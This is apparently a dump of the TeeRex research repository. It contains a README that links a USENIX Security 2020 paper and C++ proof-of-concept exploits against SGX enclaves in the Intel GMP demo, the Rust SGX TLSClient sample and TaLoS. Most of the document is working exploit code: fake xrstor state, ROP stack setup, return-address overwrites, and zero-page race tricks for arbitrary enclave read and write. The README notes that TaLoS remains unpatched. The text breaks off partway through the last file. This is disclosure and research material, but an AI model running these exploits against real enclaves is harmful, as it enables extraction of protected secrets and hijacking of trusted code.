├── Intel-SGX-GMP-Demo-exploit ├── App │ └── App.cpp ├── EnclaveGmpTest.signed.so ├── Makefile └── enclave.signed.so ├── README.md ├── Rust-TLSClient-overlap-exploit ├── App │ └── App.cpp ├── Makefile ├── app └── enclave.signed.so ├── TaLoS-exploit-race-arbitrary-read ├── App │ └── App.cpp ├── Makefile └── enclave.signed.so ├── TaLoS-exploit-race-arbitrary-write ├── App │ └── App.cpp ├── Makefile └── enclave.signed.so ├── TaLoS-exploit ├── App │ └── App.cpp ├── Makefile └── enclave.signed.so └── WolfSSL-exploit ├── App └── App.cpp ├── Makefile ├── Wolfssl_Enclave.signed.so ├── app └── enclave.signed.so /Intel-SGX-GMP-Demo-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "sgx_edger8r.h" // sgx_ecall 7 | #include "sgx_urts.h" // sgx_create_enclave 8 | 9 | /* Global EID shared by multiple threads */ 10 | sgx_enclave_id_t global_eid = 0; 11 | 12 | int initialize_enclave(const char* enclave_filename) 13 | { 14 | if (global_eid != 0) 15 | return 0; 16 | 17 | sgx_launch_token_t token = {0}; 18 | int updated; 19 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 20 | if (ret != SGX_SUCCESS) 21 | return -1; 22 | 23 | return 0; 24 | } 25 | 26 | void* enclave_base() { 27 | FILE* fp = fopen("/proc/self/smaps", "r"); 28 | if (fp == 0) return 0; 29 | char* line = 0; size_t len = 0; ssize_t read; 30 | 31 | // first isgx page (CODE, r_x) 32 | while((read = getline(&line, &len, fp)) != -1) 33 | if (strstr(line, "isgx")) 34 | return (void*)strtoll(line, NULL, 16); 35 | } 36 | 37 | int call_ecall(int ecall_idx, void* ms) 38 | { 39 | sgx_ecall(global_eid, ecall_idx, 0, ms); 40 | } 41 | 42 | int main(int argc, char** argv) 43 | { 44 | if (initialize_enclave("enclave.signed.so") < 0) 45 | return -1; 46 | 47 | 48 | uint64_t enclave_addr = (uint64_t)enclave_base(); 49 | 50 | static uint64_t b = 1; 51 | static uint64_t a = enclave_addr + 0x4ed23 - b; // BASE + asm_oret+13 - other_summand 52 | struct mpz_t { int alloc = 2; int size = 1; void* data; }; 53 | 54 | static uint64_t xregs_restore[] = { 55 | 0x37f, 0x0, 0x0, 0xffff00001f80, 56 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 57 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 58 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 59 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x8000000000000000, 60 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, // 0x240: end of systhetic state 61 | 62 | 0x0, 0xdeadbeef, // 4. ret after asm_ret: all registers and stack under control 63 | }; 64 | struct mpz_t_ext { int alloc = 2; int size = 1; void* data; 65 | char dummy[0x48] = { 0 }; 66 | uint64_t rcx = (uint64_t)xregs_restore + 0x240; // rsp+0x58 // 3. set rsp after asm_ret, must be near xregs_restore 67 | char dummy2[0x32] = { 0 }; 68 | void* xregs = xregs_restore; // rsp+0x98 // 2. set fake systhetic state for restore_xregs 69 | }; 70 | 71 | static struct mpz_t_ext ma; 72 | static struct mpz_t mb, mc; 73 | ma.data = &a; 74 | mb.data = &b; 75 | mc.data = (void*) (enclave_addr + 0x1000000 + 0x3655b8); // 1. overwrite ret addr in ecall 76 | //mc.data = (void*) ((enclave_tcs & ~0xFFFFFF) + 0x362c28); // 1. overwrite ret addr in ecall 77 | 78 | printf("%p\n", mc.data); 79 | 80 | struct ms1_t { mpz_t* c = &mc; mpz_t_ext* a = &ma; mpz_t* b = &mb; }; 81 | struct ms1_t ms1; 82 | call_ecall(1, (void*) &ms1); // e_mpz_add 83 | } 84 | -------------------------------------------------------------------------------- /Intel-SGX-GMP-Demo-exploit/EnclaveGmpTest.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/Intel-SGX-GMP-Demo-exploit/EnclaveGmpTest.signed.so -------------------------------------------------------------------------------- /Intel-SGX-GMP-Demo-exploit/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service -ldl 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(Enclave_Name) $(Signed_Enclave_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | -------------------------------------------------------------------------------- /Intel-SGX-GMP-Demo-exploit/enclave.signed.so: -------------------------------------------------------------------------------- 1 | EnclaveGmpTest.signed.so -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TeeRex SGX Exploits 2 | 3 | This repository contains several exploits that we developed in the course of our research on memory corruption bugs in SGX enclaves. 4 | The full results of our research are published at [USENIX Security 2020](https://www.usenix.org/conference/usenixsecurity20/presentation/cloosters). 5 | 6 | | Project | Vulnerable Version | Exploit | Comment | 7 | |--|--|--|--| 8 | | [Intel GMP Demo](https://github.com/intel/sgx-gmp-demo) | [9533574](https://github.com/intel/sgx-gmp-demo/tree/9533574f95b97ea08adb6724d8be797c53119dac) | [Intel SGX GMP Demo Exploit](./Intel-SGX-GMP-Demo-exploit) | ✔️ [Fixed](https://github.com/intel/sgx-gmp-demo/commit/0491317b4112b06e16b3f3b1c07b06e400b32391) | 9 | | [Rust SGX SDK TLSClient](https://github.com/apache/incubator-teaclave-sgx-sdk) | [v1.0.9](https://github.com/apache/incubator-teaclave-sgx-sdk/tree/v1.0.9) | [Rust TLSClient Overlap Exploit](./Rust-TLSClient-overlap-exploit) | ✔️ [Fixed](https://github.com/apache/incubator-teaclave-sgx-sdk/commit/f975a19982740d5d2e878b595c1be5d1a1a31ecb) | 10 | | [WolfSSL](https://github.com/wolfSSL/wolfssl-examples) | [d330c53](https://github.com/wolfSSL/wolfssl-examples/tree/d330c53baff52fdf4338619cd4f82ae25c1bc294) | [WolfSSL Exploit](./WolfSSL-exploit) | ✔️ [Fixed](https://github.com/wolfSSL/wolfssl-examples/commit/1862c108d7e3be47a3d6fe18f406df444ae36e6e#diff-f23aff9e4544c233135f934bc7478f11) | 11 | | [TaLoS](https://github.com/lsds/TaLoS) | all | - [TaLoS Exploit](./TaLoS-exploit)
- [TaLoS Arbitrary Read](./TaLoS-exploit-race-arbitrary-read)
- [TaLoS Arbitrary Write](./TaLoS-exploit-race-arbitrary-write) | ❌ Not fixed, Project not maintained: [Issue](https://github.com/lsds/TaLoS/issues/18) | 12 | | Synaptics SynaTEE Driver | 5.2.3535.26 | Exploit not public | ✔️ Fixed ([CVE-2019-18619](https://www.cve.org/CVERecord?id=CVE-2019-18619)) | 13 | | Goodix Fingerprint Driver | 2.1.32.200 | Exploit not public | ✔️ Fixed ([DSA-2020-138](https://www.dell.com/support/kbdoc/de-de/000131724/dsa-2020-138-dell-client-platform-security-update-for-goodix-fingerprint-sensor-driver-vulnerability)) | 14 | 15 | 16 | ## Running the Exploits 17 | ### Prerequisites 18 | Install the [Intel SGX driver](https://github.com/intel/linux-sgx-driver/) and the [Intel SGX SDK](https://github.com/intel/linux-sgx/). 19 | 20 | ### Build and Run 21 | Note: The PoC exploits contain hard-coded addresses that depend on the compiled enclaves included in the repository. 22 | 23 | The exploit code follows the make principles of the SGX SDK: 24 | 25 | * Use `make` in the respective directories to compile the exploit 26 | * Run the exploit using: `./app` 27 | 28 | All exploits overwrite the instruction pointer in the enclave, some also include follow up code to also control the stack pointer. Therefore there are different outputs when executing the exploits: Some will return a simple value to indicate the result, others just crash after the exploit hijacked the control flow and jumped to a bogus address. *None of the PoC exploits will harm you or your setup in any way!* 29 | 30 | ## Exploit Concepts 31 | ### [Intel SGX GMP Demo Exploit](./Intel-SGX-GMP-Demo-exploit) 32 | The [Intel GMP Demo](https://github.com/intel/sgx-gmp-demo) shows how to use the GMP library inside an SGX enclave. 33 | Insufficient input validation made it possible to read and write arbitrary memory including the secure region. 34 | 35 | ### [Rust TLSClient Overlap Exploit](./Rust-TLSClient-overlap-exploit) 36 | The [Rust SGX SDK](https://github.com/apache/incubator-teaclave-sgx-sdk) provides a compatibility layer to enable enclave development using the memory-safe Rust-language. The demonstrative implementation of a [TLS Client/Server application](https://github.com/apache/incubator-teaclave-sgx-sdk/tree/master/samplecode/tls/tlsclient) contained a design flaw that can be used to hijack the control flow. 37 | 38 | ### [WolfSSL Exploit](./WolfSSL-exploit) 39 | [WolfSSL](https://github.com/wolfSSL/wolfssl-examples) is a portable SSL/TLS library that can be used in an SGX enclave. The SGX layer contained a conceptual error that allowed an attacker to hijack the control flow. 40 | 41 | ### TaLoS Exploits 42 | ⚠️ `Warning: The project is unmaintained and is still vulnerable!` 43 | 44 | The [TaLoS project](https://github.com/lsds/TaLoS) provides TLS termination for nginx or apache inside an SGX enclave. We demonstrate: 45 | 46 | * **[Control Flow Hijacking](./TaLoS-exploit)** using an insufficiently validated pointer, 47 | * **[Arbitrary Read](./TaLoS-exploit-race-arbitrary-read)** using a NULL-pointer dereference, 48 | * **[Arbitrary Write](./TaLoS-exploit-race-arbitrary-write)** using a race condition. 49 | 50 | 51 | 52 | # Citing in Academic Work 53 | 54 | These PoC exploits are part of the research that we present in our [USENIX Security 2020 paper](https://www.usenix.org/conference/usenixsecurity20/presentation/cloosters). 55 | If you want to refer to these exploits or our paper in academic work, please use the following BibTeX entry for citation: 56 | 57 | ```bibtex 58 | @InProceedings{cloosters2020teerex, 59 | title = "{TeeRex:} Discovery and Exploitation of Memory Corruption Vulnerabilities in {SGX} Enclaves", 60 | author = "Tobias Cloosters and Michael Rodler and Lucas Davi", 61 | booktitle = "29th {USENIX} Security Symposium ({USENIX} Security '20)", 62 | year = "2020", 63 | } 64 | ``` 65 | -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "sgx_edger8r.h" // sgx_ecall 7 | #include "sgx_urts.h" // sgx_create_enclave 8 | 9 | sgx_enclave_id_t global_eid = 0; 10 | 11 | int initialize_enclave(const char* enclave_filename) 12 | { 13 | if (global_eid != 0) 14 | return 0; 15 | 16 | sgx_launch_token_t token = {0}; 17 | int updated; 18 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 19 | if (ret != SGX_SUCCESS) 20 | return -1; 21 | 22 | return 0; 23 | } 24 | 25 | void* enclave_base() { 26 | FILE* fp = fopen("/proc/self/smaps", "r"); 27 | if (fp == 0) return 0; 28 | char* line = 0; size_t len = 0; ssize_t read; 29 | 30 | // first isgx page (CODE, r_x) 31 | while((read = getline(&line, &len, fp)) != -1) 32 | if (strstr(line, "isgx")) 33 | return (void*)strtoll(line, NULL, 16); 34 | } 35 | 36 | int call_ecall(int ecall_idx, void* ms) 37 | { 38 | sgx_ecall(global_eid, ecall_idx, 0, ms); 39 | } 40 | 41 | int main(int argc, char** argv) 42 | { 43 | if (initialize_enclave("enclave.signed.so") < 0) 44 | return -1; 45 | 46 | uint64_t* base = (uint64_t*) enclave_base(); 47 | void* page = mmap(base - 0x1000/8, 0x1000, 7, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); 48 | printf("%p %p\n", base, page); 49 | 50 | size_t BUFFER_SIZE = 0x4c8 / sizeof(uint64_t); 51 | 52 | uint64_t* buffer = (uint64_t*) base - BUFFER_SIZE + 1; 53 | for (uint64_t i = 0; i < BUFFER_SIZE - 1; ++i) 54 | buffer[i] = i << 32; 55 | 56 | // (1) survive free call 57 | buffer[0] = (uint64_t) (buffer + 5); 58 | buffer[1] = (uint64_t) (buffer + 10); 59 | buffer[9] = 0; 60 | buffer[8] = (uint64_t) (buffer + 20); 61 | buffer[20+0x40/8] = 0; 62 | buffer[5] = (uint64_t) (buffer + 30) + 1; 63 | 64 | // (2) jmp target: asm_oret+13 65 | // buffer[0x1e] = 0xDEADC0DE; 66 | buffer[0x1e] = (uint64_t) base + 0x2235de + 13; // asm_oret+13 67 | 68 | static uint64_t new_stack[0x100]; 69 | static uint64_t xregs_restore[] __attribute__ ((aligned(64))) = { 70 | // (4) SYNTHETIC STATE (rstor) 71 | 0x37f, 0x0, 0x0, 0xffff00001f80, 72 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 73 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 74 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 75 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x8000000000000000, 76 | 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, // 0x240: end of systhetic state 77 | 78 | // (6) ROP stack: 79 | // pop rbp, ret 80 | 0x0, 0xDEADC0DE, // ... ROP chain (7) 81 | }; 82 | new_stack[0x98/8] = (uint64_t) xregs_restore; // (4) xrstor 83 | new_stack[0x58/8] = (uint64_t) xregs_restore + 0x240; // (5) final rsp 84 | 85 | new_stack[0x38/8] = 0x1; 86 | new_stack[0x38/8] = 0x2; 87 | 88 | uint64_t ms[2] = { (uint64_t) buffer, (uint64_t) new_stack /* (3) rstor stack */}; 89 | call_ecall(5, ms); // tls_client_close(session) 90 | } 91 | -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/app: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/Rust-TLSClient-overlap-exploit/app -------------------------------------------------------------------------------- /Rust-TLSClient-overlap-exploit/enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/Rust-TLSClient-overlap-exploit/enclave.signed.so -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-read/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | #include 6 | 7 | // mmap 8 | #include 9 | #include 10 | #include 11 | 12 | #include "sgx_edger8r.h" // sgx_ecall 13 | #include "sgx_urts.h" // sgx_create_enclave 14 | 15 | /* Global EID shared by multiple threads */ 16 | sgx_enclave_id_t global_eid = 0; 17 | 18 | int initialize_enclave(const char* enclave_filename) 19 | { 20 | if (global_eid != 0) 21 | return 0; 22 | 23 | sgx_launch_token_t token = {0}; 24 | int updated; 25 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 26 | if (ret != SGX_SUCCESS) 27 | return -1; 28 | 29 | return 0; 30 | } 31 | 32 | void* enclave_base() { 33 | FILE* fp = fopen("/proc/self/smaps", "r"); 34 | if (fp == 0) return 0; 35 | char* line = 0; size_t len = 0; ssize_t read; 36 | 37 | // first isgx page (CODE, r_x) 38 | while((read = getline(&line, &len, fp)) != -1) 39 | if (strstr(line, "isgx")) 40 | return (void*)strtoll(line, NULL, 16); 41 | } 42 | 43 | int call_ecall(int ecall_idx, void* ms) 44 | { 45 | sgx_ecall(global_eid, ecall_idx, 0, ms); 46 | } 47 | 48 | /* 49 | ***************************************************** 50 | * ALLOW ZERO PAGE: sudo sysctl vm.mmap_min_addr=0 51 | ***************************************************** 52 | */ 53 | int main(int argc, char** argv) 54 | { 55 | if (initialize_enclave("enclave.signed.so") < 0) 56 | return -1; 57 | uint64_t* base = (uint64_t*) enclave_base(); 58 | 59 | // 1. Map the Zero Page. 60 | void *zero = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); 61 | if (zero == (void*)-1) { 62 | printf("sudo sysctl vm.mmap_min_addr=0\n"); 63 | return -1; 64 | } 65 | 66 | uint64_t arbr = 0x57eac18; // arbitrary read address in enclave 67 | 68 | // 2. This ECall will copy the value from the specified address to the Zero Page. 69 | uint64_t ms[] = { 0, (uint64_t)base + arbr - 0x18 }; 70 | // public BIO *ecall_SSL_get_rbio([user_check] const SSL *s); 71 | call_ecall(56, ms); 72 | 73 | // 3. Print the disclosed value from address 0x18. 74 | printf("*%p = %llx\n", arbr, *(uint64_t*)0x18); 75 | } 76 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-read/Makefile: -------------------------------------------------------------------------------- 1 | ######## SGX SDK Settings ######## 2 | 3 | SGX_SDK ?= /opt/intel/sgxsdk 4 | SGX_MODE ?= HW 5 | SGX_ARCH ?= x64 6 | SGX_DEBUG ?= 1 7 | 8 | ifeq ($(shell getconf LONG_BIT), 32) 9 | SGX_ARCH := x86 10 | else ifeq ($(findstring -m32, $(CXXFLAGS)), -m32) 11 | SGX_ARCH := x86 12 | endif 13 | 14 | ifeq ($(SGX_ARCH), x86) 15 | SGX_COMMON_CFLAGS := -m32 16 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib 17 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign 18 | SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r 19 | else 20 | SGX_COMMON_CFLAGS := -m64 21 | SGX_LIBRARY_PATH := $(SGX_SDK)/lib64 22 | SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign 23 | SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r 24 | endif 25 | 26 | ifeq ($(SGX_DEBUG), 1) 27 | ifeq ($(SGX_PRERELEASE), 1) 28 | $(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!) 29 | endif 30 | endif 31 | 32 | ifeq ($(SGX_DEBUG), 1) 33 | SGX_COMMON_CFLAGS += -O0 -g 34 | else 35 | SGX_COMMON_CFLAGS += -O2 36 | endif 37 | 38 | ######## App Settings ######## 39 | 40 | ifneq ($(SGX_MODE), HW) 41 | Urts_Library_Name := sgx_urts_sim 42 | else 43 | Urts_Library_Name := sgx_urts 44 | endif 45 | 46 | App_Cpp_Files := App/App.cpp 47 | App_Include_Paths := -IInclude -IApp -I$(SGX_SDK)/include 48 | 49 | App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths) 50 | 51 | # Three configuration modes - Debug, prerelease, release 52 | # Debug - Macro DEBUG enabled. 53 | # Prerelease - Macro NDEBUG and EDEBUG enabled. 54 | # Release - Macro NDEBUG enabled. 55 | ifeq ($(SGX_DEBUG), 1) 56 | App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG 57 | else ifeq ($(SGX_PRERELEASE), 1) 58 | App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG 59 | else 60 | App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG 61 | endif 62 | 63 | App_Cpp_Flags := $(App_C_Flags) -std=c++11 64 | App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread 65 | 66 | ifneq ($(SGX_MODE), HW) 67 | App_Link_Flags += -lsgx_uae_service_sim 68 | else 69 | App_Link_Flags += -lsgx_uae_service 70 | endif 71 | 72 | App_Cpp_Objects := $(App_Cpp_Files:.cpp=.o) 73 | 74 | App_Name := app 75 | 76 | ######## App Objects ######## 77 | 78 | App/%.o: App/%.cpp 79 | @$(CXX) $(App_Cpp_Flags) -c $< -o $@ 80 | @echo "CXX <= $<" 81 | 82 | $(App_Name): $(App_Cpp_Objects) 83 | @$(CXX) $^ -o $@ $(App_Link_Flags) 84 | @echo "LINK => $@" 85 | 86 | .config_$(Build_Mode)_$(SGX_ARCH): 87 | @rm -f .config_* $(App_Name) $(App_Cpp_Objects) App/Enclave_u.* $(Enclave_Cpp_Objects) Enclave/Enclave_t.* 88 | @touch .config_$(Build_Mode)_$(SGX_ARCH) 89 | 90 | -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-read/enclave.signed.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/uni-due-syssec/teerex-exploits/c07af5c58c418161c9adc63b3e8db574bc8161ae/TaLoS-exploit-race-arbitrary-read/enclave.signed.so -------------------------------------------------------------------------------- /TaLoS-exploit-race-arbitrary-write/App/App.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include 5 | #include 6 | 7 | // mmap 8 | #include 9 | #include 10 | #include 11 | 12 | #include "sgx_edger8r.h" // sgx_ecall 13 | #include "sgx_urts.h" // sgx_create_enclave 14 | 15 | /* Global EID shared by multiple threads */ 16 | sgx_enclave_id_t global_eid = 0; 17 | 18 | int initialize_enclave(const char* enclave_filename) 19 | { 20 | if (global_eid != 0) 21 | return 0; 22 | 23 | sgx_launch_token_t token = {0}; 24 | int updated; 25 | sgx_status_t ret = sgx_create_enclave(enclave_filename, SGX_DEBUG_FLAG, &token, &updated, &global_eid, NULL); 26 | if (ret != SGX_SUCCESS) 27 | return -1; 28 | 29 | return 0; 30 | } 31 | 32 | void* enclave_base() { 33 | FILE* fp = fopen("/proc/self/smaps", "r"); 34 | if (fp == 0) return 0; 35 | char* line = 0; size_t len = 0; ssize_t read; 36 | 37 | // first isgx page (CODE, r_x) 38 | while((read = getline(&line, &len, fp)) != -1) 39 | if (strstr(line, "isgx")) 40 | return (void*)strtoll(line, NULL, 16); 41 | } 42 | 43 | int call_ecall(int ecall_idx, void* ms) 44 | { 45 | sgx_ecall(global_eid, ecall_idx, 0, ms); 46 | } 47 | 48 | // this function is run by the second thread 49 | void* thread(void *) 50 | { 51 | printf("RUNNING\n"); 52 | while (true) { 53 | *(uint64_t*)0x18 = 0xdeadc0de; // SSL->wbio 54 | } 55 | } 56 | 57 | /* 58 | ***************************************************** 59 | * ALLOW ZERO PAGE: sudo sysctl vm.mmap_min_addr=0 60 | ***************************************************** 61 | */ 62 | int main(int argc, char** argv) 63 | { 64 | if (initialize_enclave("enclave.signed.so") < 0) 65 | return -1; 66 | uint64_t* base = (uint64_t*) enclave_base(); 67 | 68 | // 1. Map the Zero Page. 69 | void *zero = mmap(0, 0x10000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 